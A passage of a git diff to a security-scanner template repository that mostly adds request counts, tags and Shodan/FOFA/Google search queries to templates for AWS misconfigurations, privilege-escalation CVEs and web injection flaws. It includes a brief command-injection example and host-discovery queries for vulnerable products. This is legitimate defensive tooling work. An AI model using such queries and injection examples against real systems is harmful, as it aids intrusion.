authenticated users, preventing unauthorized operations reference: - https://docs.aws.amazon.com/AmazonS3/latest/userguide/manage-versioning-examples.html + metadata: + max-request: 2 tags: cloud,devops,aws,amazon,s3,aws-cloud-config flow: | diff --git a/cloud/aws/s3/s3-bucket-key.yaml b/cloud/aws/s3/s3-bucket-key.yaml index aa49b7d2d1..b6e4a85e93 100644 --- a/cloud/aws/s3/s3-bucket-key.yaml +++ b/cloud/aws/s3/s3-bucket-key.yaml @@ -7,6 +7,8 @@ info: This template verifies if Amazon S3 buckets have bucket keys enabled to optimize the cost of AWS Key Management Service (SSE-KMS) for server-side encryption reference: - https://docs.aws.amazon.com/AmazonS3/latest/userguide/manage-versioning-examples.html + metadata: + max-request: 2 tags: cloud,devops,aws,amazon,s3,aws-cloud-config flow: | diff --git a/cloud/aws/s3/s3-bucket-policy-public-access.yaml b/cloud/aws/s3/s3-bucket-policy-public-access.yaml index 2d1b41dd32..9edb4e7d62 100644 --- a/cloud/aws/s3/s3-bucket-policy-public-access.yaml +++ b/cloud/aws/s3/s3-bucket-policy-public-access.yaml @@ -7,6 +7,8 @@ info: This template checks if Amazon S3 buckets are configured to prevent public access via bucket policies reference: - https://docs.aws.amazon.com/cli/latest/reference/s3api/get-bucket-policy.html + metadata: + max-request: 2 tags: cloud,devops,aws,amazon,s3,aws-cloud-config flow: | diff --git a/cloud/aws/s3/s3-mfa-delete-check.yaml b/cloud/aws/s3/s3-mfa-delete-check.yaml index 13ccba19cd..257ea66fa6 100644 --- a/cloud/aws/s3/s3-mfa-delete-check.yaml +++ b/cloud/aws/s3/s3-mfa-delete-check.yaml @@ -7,6 +7,8 @@ info: This template verifies that Amazon S3 buckets are configured with Multi-Factor Authentication (MFA) Delete feature, ensuring enhanced protection against unauthorized deletion of versioned objects reference: - https://docs.aws.amazon.com/cli/latest/reference/s3api/get-bucket-versioning.html + metadata: + max-request: 2 tags: cloud,devops,aws,amazon,s3,aws-cloud-config flow: | diff --git a/cloud/aws/s3/s3-public-read-acp.yaml b/cloud/aws/s3/s3-public-read-acp.yaml index a365761525..cc194ad440 100644 --- a/cloud/aws/s3/s3-public-read-acp.yaml +++ b/cloud/aws/s3/s3-public-read-acp.yaml @@ -8,6 +8,8 @@ info: Verifies that Amazon S3 buckets do not permit public 'READ_ACP' (LIST) access to anonymous users, protecting against unauthorized data exposure reference: - https://docs.aws.amazon.com/cli/latest/reference/s3api/get-bucket-acl.html + metadata: + max-request: 2 tags: cloud,devops,aws,amazon,s3,aws-cloud-config flow: | diff --git a/cloud/aws/s3/s3-public-read.yaml b/cloud/aws/s3/s3-public-read.yaml index 56877aa63a..a8fa82cfc6 100644 --- a/cloud/aws/s3/s3-public-read.yaml +++ b/cloud/aws/s3/s3-public-read.yaml @@ -8,6 +8,8 @@ info: Verifies that Amazon S3 buckets do not permit public 'READ' (LIST) access to anonymous users, protecting against unauthorized data exposure reference: - https://docs.aws.amazon.com/cli/latest/reference/s3api/get-bucket-acl.html + metadata: + max-request: 2 tags: cloud,devops,aws,amazon,s3,aws-cloud-config flow: | diff --git a/cloud/aws/s3/s3-public-write-acp.yaml b/cloud/aws/s3/s3-public-write-acp.yaml index aff44da984..d41c09942e 100644 --- a/cloud/aws/s3/s3-public-write-acp.yaml +++ b/cloud/aws/s3/s3-public-write-acp.yaml @@ -7,6 +7,8 @@ info: Checks if Amazon S3 buckets are secured against public WRITE_ACP access, preventing unauthorized modifications to access control permissions. reference: - https://docs.aws.amazon.com/cli/latest/reference/s3api/get-bucket-acl.html + metadata: + max-request: 2 tags: cloud,devops,aws,amazon,s3,aws-cloud-config flow: | diff --git a/cloud/aws/s3/s3-public-write.yaml b/cloud/aws/s3/s3-public-write.yaml index d2192c8cc1..ed2c3a6a19 100644 --- a/cloud/aws/s3/s3-public-write.yaml +++ b/cloud/aws/s3/s3-public-write.yaml @@ -7,6 +7,8 @@ info: Checks if Amazon S3 buckets are secured against public WRITE access, preventing unauthorized modifications to access control permissions. reference: - https://docs.aws.amazon.com/cli/latest/reference/s3api/get-bucket-acl.html + metadata: + max-request: 2 tags: cloud,devops,aws,amazon,s3,aws-cloud-config flow: | diff --git a/cloud/aws/s3/s3-server-side-encryption.yaml b/cloud/aws/s3/s3-server-side-encryption.yaml index 448ee59987..114b86dd79 100644 --- a/cloud/aws/s3/s3-server-side-encryption.yaml +++ b/cloud/aws/s3/s3-server-side-encryption.yaml @@ -7,6 +7,8 @@ info: This template verifies if Amazon S3 buckets have server-side encryption enabled for protecting sensitive content at rest, using either AWS S3-managed keys (SSE-S3) or AWS KMS-managed keys (SSE-KMS). reference: - https://docs.aws.amazon.com/cli/latest/reference/s3api/get-bucket-encryption.html + metadata: + max-request: 2 tags: cloud,devops,aws,amazon,s3,aws-cloud-config flow: | diff --git a/cloud/aws/s3/s3-versioning.yaml b/cloud/aws/s3/s3-versioning.yaml index 30531fed21..d43ca32d56 100644 --- a/cloud/aws/s3/s3-versioning.yaml +++ b/cloud/aws/s3/s3-versioning.yaml @@ -7,6 +7,8 @@ info: Verifies that Amazon S3 buckets have object versioning enabled, providing a safeguard for recovering overwritten or deleted objects reference: - https://docs.aws.amazon.com/AmazonS3/latest/userguide/manage-versioning-examples.html + metadata: + max-request: 2 tags: cloud,devops,aws,amazon,s3,aws-cloud-config flow: | diff --git a/cloud/aws/sns/sns-topic-public-accessible.yaml b/cloud/aws/sns/sns-topic-public-accessible.yaml index 5cc304a527..fac24e4858 100644 --- a/cloud/aws/sns/sns-topic-public-accessible.yaml +++ b/cloud/aws/sns/sns-topic-public-accessible.yaml @@ -8,6 +8,8 @@ info: This template checks if Amazon SNS topics are configured to prevent public access via topic policies. reference: - https://docs.aws.amazon.com/sns/latest/api/API_GetTopicAttributes.html + metadata: + max-request: 2 tags: cloud,devops,aws,amazon,sns,aws-cloud-config flow: | diff --git a/cloud/aws/vpc/nacl-open-inbound.yaml b/cloud/aws/vpc/nacl-open-inbound.yaml index 1e8bf93789..df1b38b564 100644 --- a/cloud/aws/vpc/nacl-open-inbound.yaml +++ b/cloud/aws/vpc/nacl-open-inbound.yaml @@ -11,8 +11,9 @@ info: Restrict Network ACL inbound rules to only allow necessary IP ranges and ports as per the Principle of Least Privilege. reference: - https://docs.aws.amazon.com/vpc/latest/userguide/vpc-network-acls.html + metadata: + max-request: 2 tags: cloud,devops,aws,amazon,vpc,aws-cloud-config - variables: region: "us-east-1" diff --git a/cloud/aws/vpc/nacl-outbound-restrict.yaml b/cloud/aws/vpc/nacl-outbound-restrict.yaml index b7483da1ef..860dbd138c 100644 --- a/cloud/aws/vpc/nacl-outbound-restrict.yaml +++ b/cloud/aws/vpc/nacl-outbound-restrict.yaml @@ -11,8 +11,9 @@ info: Modify NACL outbound rules to limit traffic to only the ports required for legitimate business needs. reference: - https://docs.aws.amazon.com/vpc/latest/userguide/vpc-network-acls.html + metadata: + max-request: 2 tags: cloud,devops,aws,amazon,vpc,aws-cloud-config - variables: region: "us-east-1" diff --git a/cloud/aws/vpc/nat-gateway-usage.yaml b/cloud/aws/vpc/nat-gateway-usage.yaml index 308cb0ab0d..740e32638a 100644 --- a/cloud/aws/vpc/nat-gateway-usage.yaml +++ b/cloud/aws/vpc/nat-gateway-usage.yaml @@ -11,8 +11,9 @@ info: Replace NAT instances with Amazon Managed NAT Gateway to ensure high availability and scalability in your VPC network. reference: - https://docs.aws.amazon.com/vpc/latest/userguide/vpc-nat-gateway.html + metadata: + max-request: 2 tags: cloud,devops,aws,amazon,vpc,aws-cloud-config - variables: region: "us-east-1" diff --git a/cloud/aws/vpc/unrestricted-admin-ports.yaml b/cloud/aws/vpc/unrestricted-admin-ports.yaml index 11da6b63b4..9be1fe9293 100644 --- a/cloud/aws/vpc/unrestricted-admin-ports.yaml +++ b/cloud/aws/vpc/unrestricted-admin-ports.yaml @@ -11,8 +11,9 @@ info: Restrict access to ports 22 and 3389 to trusted IPs or IP ranges to adhere to the Principle of Least Privilege (POLP). reference: - https://docs.aws.amazon.com/vpc/latest/userguide/vpc-network-acls.html + metadata: + max-request: 2 tags: cloud,devops,aws,amazon,vpc,aws-cloud-config - variables: region: "us-east-1" diff --git a/cloud/aws/vpc/vpc-endpoint-exposed.yaml b/cloud/aws/vpc/vpc-endpoint-exposed.yaml index 6fe8d3c737..73c01bc888 100644 --- a/cloud/aws/vpc/vpc-endpoint-exposed.yaml +++ b/cloud/aws/vpc/vpc-endpoint-exposed.yaml @@ -11,8 +11,9 @@ info: Update the VPC endpoint's policy to restrict access only to authorized entities and ensure all requests are signed. reference: - https://docs.aws.amazon.com/vpc/latest/userguide/vpc-endpoints-access.html + metadata: + max-request: 2 tags: cloud,devops,aws,amazon,vpc,aws-cloud-config - variables: region: "us-east-1" diff --git a/cloud/aws/vpc/vpc-endpoints-not-deployed.yaml b/cloud/aws/vpc/vpc-endpoints-not-deployed.yaml index c2dcfb6728..ca886cf418 100644 --- a/cloud/aws/vpc/vpc-endpoints-not-deployed.yaml +++ b/cloud/aws/vpc/vpc-endpoints-not-deployed.yaml @@ -11,8 +11,9 @@ info: Implement VPC endpoints for supported AWS services to secure and optimize connectivity within your VPC, minimizing external access risks. reference: - https://docs.aws.amazon.com/vpc/latest/userguide/vpc-endpoints.html + metadata: + max-request: 2 tags: cloud,devops,aws,amazon,vpc,aws-cloud-config - variables: region: "us-east-1" diff --git a/cloud/aws/vpc/vpc-flowlogs-not-enabled.yaml b/cloud/aws/vpc/vpc-flowlogs-not-enabled.yaml index ca6474d99e..f4343771a9 100644 --- a/cloud/aws/vpc/vpc-flowlogs-not-enabled.yaml +++ b/cloud/aws/vpc/vpc-flowlogs-not-enabled.yaml @@ -11,8 +11,9 @@ info: Enable VPC Flow Logs in the AWS Management Console under the VPC dashboard to collect data on IP traffic going to and from network interfaces in your VPC. reference: - https://docs.aws.amazon.com/vpc/latest/userguide/flow-logs.html + metadata: + max-request: 2 tags: cloud,devops,aws,amazon,vpc,aws-cloud-config - variables: region: "us-east-1" diff --git a/cloud/aws/vpc/vpn-tunnel-down.yaml b/cloud/aws/vpc/vpn-tunnel-down.yaml index 1e7ddb8308..83f8318d97 100644 --- a/cloud/aws/vpc/vpn-tunnel-down.yaml +++ b/cloud/aws/vpc/vpn-tunnel-down.yaml @@ -11,8 +11,9 @@ info: Monitor VPN tunnel status via the AWS Management Console or CLI. If a tunnel is DOWN, troubleshoot according to AWS documentation and ensure redundancy by configuring multiple tunnels. reference: - https://docs.aws.amazon.com/vpn/latest/s2svpn/VPNConnections.html + metadata: + max-request: 2 tags: cloud,devops,aws,amazon,vpn,aws-cloud-config - variables: region: "us-east-1" diff --git a/cloud/enum/azure-db-enum.yaml b/cloud/enum/azure-db-enum.yaml index 202edfdb07..85240d75b9 100644 --- a/cloud/enum/azure-db-enum.yaml +++ b/cloud/enum/azure-db-enum.yaml @@ -9,7 +9,7 @@ info: metadata: verified: true max-request: 1 - tags: cloud,enum,cloud-enum,azure + tags: cloud,enum,cloud-enum,azure,dns self-contained: true diff --git a/cloud/enum/azure-vm-cloud-enum.yaml b/cloud/enum/azure-vm-cloud-enum.yaml index bad214eb39..20d09ff55a 100644 --- a/cloud/enum/azure-vm-cloud-enum.yaml +++ b/cloud/enum/azure-vm-cloud-enum.yaml @@ -9,7 +9,7 @@ info: metadata: verified: true max-request: 1 - tags: cloud,cloud-enum,azure,fuzz,enum + tags: cloud,cloud-enum,azure,fuzz,enum,dns self-contained: true diff --git a/code/cves/2019/CVE-2019-14287.yaml b/code/cves/2019/CVE-2019-14287.yaml index 30b7130474..20e20ec8fa 100644 --- a/code/cves/2019/CVE-2019-14287.yaml +++ b/code/cves/2019/CVE-2019-14287.yaml @@ -25,7 +25,7 @@ info: max-request: 2 vendor: sudo_project product: sudo - tags: packetstorm,cve,cve2019,sudo,code,linux,privesc,local,canonical + tags: packetstorm,cve,cve2019,sudo,code,linux,privesc,local,canonical,sudo_project self-contained: true code: diff --git a/code/cves/2021/CVE-2021-3156.yaml b/code/cves/2021/CVE-2021-3156.yaml index b92022c2ba..f0c37464f1 100644 --- a/code/cves/2021/CVE-2021-3156.yaml +++ b/code/cves/2021/CVE-2021-3156.yaml @@ -24,7 +24,7 @@ info: verified: true vendor: sudo_project product: sudo - tags: packetstorm,cve,cve2021,sudo,code,linux,privesc,local,kev + tags: packetstorm,cve,cve2021,sudo,code,linux,privesc,local,kev,sudo_project self-contained: true code: diff --git a/code/cves/2023/CVE-2023-2640.yaml b/code/cves/2023/CVE-2023-2640.yaml index 26688faba5..e6601058e6 100644 --- a/code/cves/2023/CVE-2023-2640.yaml +++ b/code/cves/2023/CVE-2023-2640.yaml @@ -29,6 +29,7 @@ info: max-request: 2 vendor: canonical product: ubuntu_linux + shodan-query: cpe:"cpe:2.3:o:canonical:ubuntu_linux" tags: cve,cve2023,code,packetstorm,kernel,ubuntu,linux,privesc,local,canonical self-contained: true diff --git a/code/cves/2023/CVE-2023-49105.yaml b/code/cves/2023/CVE-2023-49105.yaml index 4c28f685ab..cb5cb03a00 100644 --- a/code/cves/2023/CVE-2023-49105.yaml +++ b/code/cves/2023/CVE-2023-49105.yaml @@ -17,14 +17,18 @@ info: cvss-score: 9.8 cve-id: CVE-2023-49105 cwe-id: CWE-287 - epss-score: 0.21237 - epss-percentile: 0.96302 + epss-score: 0.18166 + epss-percentile: 0.96172 cpe: cpe:2.3:a:owncloud:owncloud:*:*:*:*:*:*:*:* metadata: max-request: 2 vendor: owncloud product: owncloud - shodan-query: title:"owncloud" + shodan-query: + - title:"owncloud" + - http.title:"owncloud" + fofa-query: title="owncloud" + google-query: intitle:"owncloud" tags: cve,cve2023,code,owncloud,auth-bypass variables: username: admin diff --git a/code/cves/2023/CVE-2023-4911.yaml b/code/cves/2023/CVE-2023-4911.yaml index d96f5b0e87..3a9fa8efa0 100644 --- a/code/cves/2023/CVE-2023-4911.yaml +++ b/code/cves/2023/CVE-2023-4911.yaml @@ -24,7 +24,7 @@ info: max-request: 1 vendor: gnu product: glibc - tags: cve,cve2023,code,glibc,looneytunables,linux,privesc,local,kev + tags: cve,cve2023,code,glibc,looneytunables,linux,privesc,local,kev,gnu self-contained: true code: diff --git a/code/cves/2023/CVE-2023-6246.yaml b/code/cves/2023/CVE-2023-6246.yaml index e7a19e0257..e05515ac86 100644 --- a/code/cves/2023/CVE-2023-6246.yaml +++ b/code/cves/2023/CVE-2023-6246.yaml @@ -24,7 +24,7 @@ info: max-request: 1 vendor: gnu product: glibc - tags: cve,cve2023,code,glibc,linux,privesc,local + tags: cve,cve2023,code,glibc,linux,privesc,local,gnu self-contained: true code: diff --git a/code/cves/2024/CVE-2024-3094.yaml b/code/cves/2024/CVE-2024-3094.yaml index 413ca3d822..0ebb934f0c 100644 --- a/code/cves/2024/CVE-2024-3094.yaml +++ b/code/cves/2024/CVE-2024-3094.yaml @@ -24,7 +24,7 @@ info: verified: true vendor: tukaani product: xz - tags: cve,cve2024,local,code,xz,backdoor + tags: cve,cve2024,local,code,xz,backdoor,tukaani self-contained: true code: diff --git a/code/privilege-escalation/linux/binary/privesc-sqlite3.yaml b/code/privilege-escalation/linux/binary/privesc-sqlite3.yaml index 82bc981104..b4a78efc79 100644 --- a/code/privilege-escalation/linux/binary/privesc-sqlite3.yaml +++ b/code/privilege-escalation/linux/binary/privesc-sqlite3.yaml @@ -11,7 +11,7 @@ info: metadata: verified: true max-request: 3 - tags: code,linux,sqlite3,privesc,local + tags: code,linux,sqlite3,privesc,local,sqli self-contained: true code: diff --git a/dast/cves/2018/CVE-2018-19518.yaml b/dast/cves/2018/CVE-2018-19518.yaml index b698a2abd7..ec7011c9d2 100644 --- a/dast/cves/2018/CVE-2018-19518.yaml +++ b/dast/cves/2018/CVE-2018-19518.yaml @@ -17,6 +17,7 @@ info: cve-id: CVE-2018-19518 cwe-id: CWE-88 metadata: + max-request: 1 confidence: tenative tags: imap,dast,vulhub,cve,cve2018,rce,oast,php diff --git a/dast/cves/2021/CVE-2021-45046.yaml b/dast/cves/2021/CVE-2021-45046.yaml index 495aa6d985..3d7b35a2cf 100644 --- a/dast/cves/2021/CVE-2021-45046.yaml +++ b/dast/cves/2021/CVE-2021-45046.yaml @@ -17,6 +17,7 @@ info: cve-id: CVE-2021-45046 cwe-id: CWE-502 metadata: + max-request: 1 confidence: tenative tags: cve,cve2021,rce,oast,log4j,injection,dast diff --git a/dast/cves/2022/CVE-2022-42889.yaml b/dast/cves/2022/CVE-2022-42889.yaml index 0e37bfb162..f39e250811 100644 --- a/dast/cves/2022/CVE-2022-42889.yaml +++ b/dast/cves/2022/CVE-2022-42889.yaml @@ -6,19 +6,20 @@ info: severity: critical description: | Apache Commons Text performs variable interpolation, allowing properties to be dynamically evaluated and expanded. The standard format for interpolation is "${prefix:name}", where "prefix" is used to locate an instance of org.apache.commons.text.lookup.StringLookup that performs the interpolation. Starting with version 1.5 and continuing through 1.9, the set of default Lookup instances included interpolators that could result in arbitrary code execution or contact with remote servers. These lookups are: - "script" - execute expressions using the JVM script execution engine (javax.script) - "dns" - resolve dns records - "url" - load values from urls, including from remote servers Applications using the interpolation defaults in the affected versions may be vulnerable to remote code execution or unintentional contact with remote servers if untrusted configuration values are used. Users are recommended to upgrade to Apache Commons Text 1.10.0, which disables the problematic interpolators by default. + remediation: Upgrade to Apache Commons Text component between 1.5.0 to 1.10.0. reference: - https://lists.apache.org/thread/n2bd4vdsgkqh2tm14l1wyc3jyol7s1om - http://www.openwall.com/lists/oss-security/2022/10/13/4 - http://www.openwall.com/lists/oss-security/2022/10/18/1 - https://securitylab.github.com/advisories/GHSL-2022-018_Apache_Commons_Text/ - https://github.com/silentsignal/burp-text4shell - remediation: Upgrade to Apache Commons Text component between 1.5.0 to 1.10.0. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2022-42889 cwe-id: CWE-94 metadata: + max-request: 1 confidence: tenative tags: cve,cve2022,rce,oast,text4shell,dast diff --git a/dast/vulnerabilities/cmdi/blind-oast-polyglots.yaml b/dast/vulnerabilities/cmdi/blind-oast-polyglots.yaml index f285a8755e..2b4178e80d 100644 --- a/dast/vulnerabilities/cmdi/blind-oast-polyglots.yaml +++ b/dast/vulnerabilities/cmdi/blind-oast-polyglots.yaml @@ -5,11 +5,13 @@ info: author: pdteam,geeknik severity: high description: | - Potential blind OS command injection vulnerabilities, where the application constructs OS commands using unsanitized user input. - Successful exploitation could lead to arbitrary command execution on the system. + Potential blind OS command injection vulnerabilities, where the application constructs OS commands using unsanitized user input. + Successful exploitation could lead to arbitrary command execution on the system. reference: - https://portswigger.net/research/hunting-asynchronous-vulnerabilities - https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Command%20Injection/README.md + metadata: + max-request: 4 tags: cmdi,oast,dast,blind,polyglot variables: diff --git a/dast/vulnerabilities/cmdi/ruby-open-rce.yaml b/dast/vulnerabilities/cmdi/ruby-open-rce.yaml index ab8e383ba3..cddf72581c 100644 --- a/dast/vulnerabilities/cmdi/ruby-open-rce.yaml +++ b/dast/vulnerabilities/cmdi/ruby-open-rce.yaml @@ -5,10 +5,12 @@ info: author: pdteam severity: high description: | - Ruby's Kernel#open and URI.open enables not only file access but also process invocation by prefixing a pipe symbol (e.g., open(“| ls”)). So, it may lead to Remote Code Execution by using variable input to the argument of Kernel#open and URI.open. + Ruby's Kernel#open and URI.open enables not only file access but also process invocation by prefixing a pipe symbol (e.g., open(“| ls”)). So, it may lead to Remote Code Execution by using variable input to the argument of Kernel#open and URI.open. reference: - https://bishopfox.com/blog/ruby-vulnerabilities-exploits - https://codeql.github.com/codeql-query-help/ruby/rb-kernel-open/ + metadata: + max-request: 1 tags: cmdi,oast,dast,blind,ruby,rce variables: diff --git a/dast/vulnerabilities/crlf/cookie-injection.yaml b/dast/vulnerabilities/crlf/cookie-injection.yaml index 026d77fdeb..a07398d49e 100644 --- a/dast/vulnerabilities/crlf/cookie-injection.yaml +++ b/dast/vulnerabilities/crlf/cookie-injection.yaml @@ -7,6 +7,8 @@ info: reference: - https://www.invicti.com/blog/web-security/understanding-cookie-poisoning-attacks/ - https://docs.imperva.com/bundle/on-premises-knowledgebase-reference-guide/page/cookie_injection.htm + metadata: + max-request: 1 tags: reflected,dast,cookie,injection variables: diff --git a/dast/vulnerabilities/crlf/crlf-injection.yaml b/dast/vulnerabilities/crlf/crlf-injection.yaml index 194517a9a4..2a15f6c2e7 100644 --- a/dast/vulnerabilities/crlf/crlf-injection.yaml +++ b/dast/vulnerabilities/crlf/crlf-injection.yaml @@ -4,6 +4,8 @@ info: name: CRLF Injection author: pdteam severity: low + metadata: + max-request: 41 tags: crlf,dast http: diff --git a/dast/vulnerabilities/lfi/lfi-keyed.yaml b/dast/vulnerabilities/lfi/lfi-keyed.yaml index 93df95d6a7..85eb10c2d5 100644 --- a/dast/vulnerabilities/lfi/lfi-keyed.yaml +++ b/dast/vulnerabilities/lfi/lfi-keyed.yaml @@ -6,6 +6,8 @@ info: severity: unknown reference: - https://owasp.org/www-community/attacks/Unicode_Encoding + metadata: + max-request: 25 tags: dast,pathtraversal,lfi variables: diff --git a/dast/vulnerabilities/lfi/linux-lfi-fuzz.yaml b/dast/vulnerabilities/lfi/linux-lfi-fuzz.yaml index 4e18560c84..2ddfa0872c 100644 --- a/dast/vulnerabilities/lfi/linux-lfi-fuzz.yaml +++ b/dast/vulnerabilities/lfi/linux-lfi-fuzz.yaml @@ -7,6 +7,8 @@ info: reference: - https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Directory%20Traversal/Intruder/directory_traversal.txt - https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/File%20Inclusion + metadata: + max-request: 46 tags: lfi,dast,linux http: diff --git a/dast/vulnerabilities/lfi/windows-lfi-fuzz.yaml b/dast/vulnerabilities/lfi/windows-lfi-fuzz.yaml index 5a18f37034..41eac97775 100644 --- a/dast/vulnerabilities/lfi/windows-lfi-fuzz.yaml +++ b/dast/vulnerabilities/lfi/windows-lfi-fuzz.yaml @@ -4,6 +4,8 @@ info: name: Local File Inclusion - Windows author: pussycat0x severity: high + metadata: + max-request: 39 tags: lfi,windows,dast http: diff --git a/dast/vulnerabilities/redirect/open-redirect.yaml b/dast/vulnerabilities/redirect/open-redirect.yaml index 8c36036bcc..cc28754ad8 100644 --- a/dast/vulnerabilities/redirect/open-redirect.yaml +++ b/dast/vulnerabilities/redirect/open-redirect.yaml @@ -4,6 +4,8 @@ info: name: Open Redirect Detection author: princechaddha,AmirHossein Raeisi severity: medium + metadata: + max-request: 1 tags: redirect,dast http: diff --git a/dast/vulnerabilities/rfi/generic-rfi.yaml b/dast/vulnerabilities/rfi/generic-rfi.yaml index 46cb090042..58f33dd8cf 100644 --- a/dast/vulnerabilities/rfi/generic-rfi.yaml +++ b/dast/vulnerabilities/rfi/generic-rfi.yaml @@ -6,6 +6,8 @@ info: severity: high reference: - https://www.invicti.com/learn/remote-file-inclusion-rfi/ + metadata: + max-request: 1 tags: rfi,dast,oast http: diff --git a/dast/vulnerabilities/sqli/sqli-error-based.yaml b/dast/vulnerabilities/sqli/sqli-error-based.yaml index c0b234e0a4..095b54444d 100644 --- a/dast/vulnerabilities/sqli/sqli-error-based.yaml +++ b/dast/vulnerabilities/sqli/sqli-error-based.yaml @@ -8,6 +8,8 @@ info: Direct SQL Command Injection is a technique where an attacker creates or alters existing SQL commands to expose hidden data, or to override valuable ones, or even to execute dangerous system level commands on the database host. This is accomplished by the application taking user input and combining it with static parameters to build an SQL query . + metadata: + max-request: 3 tags: sqli,error,dast http: diff --git a/dast/vulnerabilities/ssrf/blind-ssrf.yaml b/dast/vulnerabilities/ssrf/blind-ssrf.yaml index 2c4d20d9e0..61435e1722 100644 --- a/dast/vulnerabilities/ssrf/blind-ssrf.yaml +++ b/dast/vulnerabilities/ssrf/blind-ssrf.yaml @@ -4,6 +4,8 @@ info: name: Blind SSRF OAST Detection author: pdteam severity: medium + metadata: + max-request: 3 tags: ssrf,dast,oast http: diff --git a/dast/vulnerabilities/ssrf/response-ssrf.yaml b/dast/vulnerabilities/ssrf/response-ssrf.yaml index 14f81d9668..ee4474d3a4 100644 --- a/dast/vulnerabilities/ssrf/response-ssrf.yaml +++ b/dast/vulnerabilities/ssrf/response-ssrf.yaml @@ -6,6 +6,8 @@ info: severity: high reference: - https://github.com/bugcrowd/HUNT/blob/master/ZAP/scripts/passive/SSRF.py + metadata: + max-request: 12 tags: ssrf,dast http: diff --git a/dast/vulnerabilities/ssti/reflection-ssti.yaml b/dast/vulnerabilities/ssti/reflection-ssti.yaml index fae9311f3c..a5d82890a5 100644 --- a/dast/vulnerabilities/ssti/reflection-ssti.yaml +++ b/dast/vulnerabilities/ssti/reflection-ssti.yaml @@ -7,6 +7,8 @@ info: reference: - https://github.com/zaproxy/zap-extensions/blob/2d9898900abe85a47b9fe0ceb85ec39070816b98/addOns/ascanrulesAlpha/src/main/java/org/zaproxy/zap/extension/ascanrulesAlpha/SstiScanRule.java - https://github.com/DiogoMRSilva/websitesVulnerableToSSTI#list-of-seversneeds-update + metadata: + max-request: 14 tags: ssti,dast variables: diff --git a/dast/vulnerabilities/xss/reflected-xss.yaml b/dast/vulnerabilities/xss/reflected-xss.yaml index bbb658c851..fb6c54ec24 100644 --- a/dast/vulnerabilities/xss/reflected-xss.yaml +++ b/dast/vulnerabilities/xss/reflected-xss.yaml @@ -4,6 +4,8 @@ info: name: Reflected Cross Site Scripting author: pdteam severity: medium + metadata: + max-request: 1 tags: xss,rxss,dast variables: diff --git a/dast/vulnerabilities/xxe/generic-xxe.yaml b/dast/vulnerabilities/xxe/generic-xxe.yaml index 26635ebaa5..8098d4881c 100644 --- a/dast/vulnerabilities/xxe/generic-xxe.yaml +++ b/dast/vulnerabilities/xxe/generic-xxe.yaml @@ -6,6 +6,8 @@ info: severity: medium reference: - https://github.com/andresriancho/w3af/blob/master/w3af/plugins/audit/xxe.py + metadata: + max-request: 2 tags: dast,xxe variables: diff --git a/dns/bimi-detect.yaml b/dns/bimi-detect.yaml index 3a3c25aae2..9753003759 100644 --- a/dns/bimi-detect.yaml +++ b/dns/bimi-detect.yaml @@ -1,15 +1,16 @@ id: bimi-record-detect -info: - name: BIMI Record - Detection - author: rxerium - severity: info - description: | - A BIMI record was detected - reference: - - https://postmarkapp.com/blog/what-the-heck-is-bimi - tags: dns,bimi - +info: + name: BIMI Record - Detection + author: rxerium + severity: info + description: | + A BIMI record was detected + reference: + - https://postmarkapp.com/blog/what-the-heck-is-bimi + metadata: + max-request: 1 + tags: dns,bimi dns: - name: "{{FQDN}}" type: TXT diff --git a/file/keys/credential-exposure-file.yaml b/file/keys/credential-exposure-file.yaml index 25e80b108c..80174457dd 100644 --- a/file/keys/credential-exposure-file.yaml +++ b/file/keys/credential-exposure-file.yaml @@ -5,7 +5,7 @@ info: author: Sy3Omda,geeknik,forgedhallpass,ayadi severity: unknown description: Check for multiple keys/tokens/passwords hidden inside of files. - tags: exposure,token,file,disclosure + tags: exposure,token,file,disclosure,keys # Extract secrets regex like api keys, password, token, etc ... for different services. # Always validate the leaked key/tokens/passwords to make sure it's valid, a token/keys without any impact is not an valid issue. # Severity is not fixed in this case, it varies from none to critical depending upon impact of disclosed key/tokes. diff --git a/headless/cves/2018/CVE-2018-25031.yaml b/headless/cves/2018/CVE-2018-25031.yaml index d842083a34..4b97dda33f 100644 --- a/headless/cves/2018/CVE-2018-25031.yaml +++ b/headless/cves/2018/CVE-2018-25031.yaml @@ -27,7 +27,10 @@ info: max-request: 1 vendor: smartbear product: swagger_ui - shodan-query: http.component:"Swagger" + shodan-query: + - http.component:"Swagger" + - http.component:"swagger" + - http.favicon.hash:"-1180440057" fofa-query: icon_hash="-1180440057" tags: headless,cve,cve2018,swagger,xss,smartbear headless: diff --git a/headless/webpack-sourcemap.yaml b/headless/webpack-sourcemap.yaml index 0da0eff55f..837728ef56 100644 --- a/headless/webpack-sourcemap.yaml +++ b/headless/webpack-sourcemap.yaml @@ -13,8 +13,9 @@ info: reference: - https://pulsesecurity.co.nz/articles/javascript-from-sourcemaps - https://owasp.org/www-project-web-security-testing-guide/latest/4-Web_Application_Security_Testing/01-Information_Gathering/05-Review_Web_Page_Content_for_Information_Leakage - tags: javascript,webpack,sourcemaps - + metadata: + max-request: 9 + tags: javascript,webpack,sourcemaps,headless headless: - steps: - args: diff --git a/http/cnvd/2017/CNVD-2017-06001.yaml b/http/cnvd/2017/CNVD-2017-06001.yaml index 832b701428..bbc76106c0 100644 --- a/http/cnvd/2017/CNVD-2017-06001.yaml +++ b/http/cnvd/2017/CNVD-2017-06001.yaml @@ -2,16 +2,15 @@ id: CNVD-2017-06001 info: name: Dahua DSS - SQL Injection - severity: high author: napgh0st,ritikchaddha + severity: high reference: - https://www.cnvd.org.cn/flaw/show/CNVD-2017-06001 metadata: - max-request: 1 verified: true - fofa-query: app="dahua-DSS" + max-request: 2 + fofa-query: "app=\"dahua-DSS\"" tags: cnvd,cnvd2017,sqli,dahua - variables: num: "999999999" diff --git a/http/cnvd/2019/CNVD-2019-06255.yaml b/http/cnvd/2019/CNVD-2019-06255.yaml index 5db72977bb..f73a44bd57 100644 --- a/http/cnvd/2019/CNVD-2019-06255.yaml +++ b/http/cnvd/2019/CNVD-2019-06255.yaml @@ -15,9 +15,8 @@ info: cvss-score: 10 cwe-id: CWE-77 metadata: - max-request: 1 + max-request: 2 tags: cnvd,cnvd2019,rce,catfishcms - flow: http(1) && http(2) http: diff --git a/http/cves/2001/CVE-2001-0537.yaml b/http/cves/2001/CVE-2001-0537.yaml index 8470e08000..a34dfd2c7d 100644 --- a/http/cves/2001/CVE-2001-0537.yaml +++ 